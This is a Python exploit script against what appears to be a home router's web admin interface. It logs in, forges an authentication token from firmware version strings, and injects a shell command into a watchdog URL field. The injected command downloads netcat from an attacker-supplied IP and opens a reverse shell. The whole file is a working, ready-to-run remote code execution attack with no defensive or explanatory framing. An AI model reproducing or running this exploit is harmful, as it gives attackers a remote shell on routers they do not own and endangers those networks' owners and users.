import time import requests import hashlib import sys import base64 wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12" cr_version = "CR_ITPOSTEMF286RV1.0.0B10" FORM = lambda x: {"isTest": False, "goformId": x} s = requests.Session() def login(): data = FORM("LOGIN") data["password"] = PASSWD status = s.post( f"{HOST}/goform/goform_set_cmd_process", headers=HDRS, data=data, ).json() login_status = "[+] Login: " login_status += "success" if status["result"] == "0" else "fail" print(login_status) def get_AD(): def md5(s): m = hashlib.md5() m.update(s.encode("utf-8")) return m.hexdigest() a = md5(wa_inner_version + cr_version) rd = requests.get( f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}", headers=HDRS, ) return md5(a + rd.json()["RD"]) def get_response(server_resp): status = "[+] payload injected: " if "success" in server_resp.text: status += "success" else: status += "fail" print(status) def rce(): dog_form = FORM("WATCH_DOG_SWITCH") dog_form["net_link_detect_enable"] = 1 payload = ";" payload += f"curl {IP}:8080/netcat --output /tmp/netcat; " payload += "chmod +x /tmp/netcat;" payload += f"/tmp/netcat -e sh {IP} 9999" dog_form["net_link_detect_url"] = payload dog_form["AD"] = get_AD() a = s.post( f"{HOST}/goform/goform_set_cmd_process", headers=HDRS, data=dog_form, ) get_response(a) if __name__ == "__main__": if len(sys.argv) < 4: print( "usage: python3 exploit.py http:// " ) sys.exit(0) HOST = sys.argv[1] PASSWD = base64.b64encode(sys.argv[2].encode()).decode() IP = sys.argv[3] HDRS = { "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Origin": HOST, "Referer": f"{HOST}/index.html", } login() rce()